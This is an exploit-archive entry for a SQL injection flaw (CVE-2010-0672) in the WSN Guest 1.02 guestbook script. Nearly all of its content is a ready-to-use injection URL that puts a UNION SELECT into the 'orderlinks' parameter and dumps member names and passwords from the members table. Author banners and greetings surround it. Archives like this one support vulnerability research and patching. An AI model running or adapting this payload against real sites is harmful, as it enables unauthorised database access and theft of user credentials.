WSN Guest 1.02 (orderlinks) SQL Injection Vulnerability



EDB-ID: 11436 CVE: 2010-0672 OSVDB-ID: 62530
Author: Gamoscu Published: 2010-02-13 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
###########################
Author    : Gamoscu
Homepage  : http://www.1923turk.com
Blog      : http://gamoscu.wordpress.com/
Script    : WSN Guest 1.02
Download  : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################

Exploat  :index.php?page=20&orderlinks=SQL
 



http://server/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--



############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

Veda TurlarĂ½ :)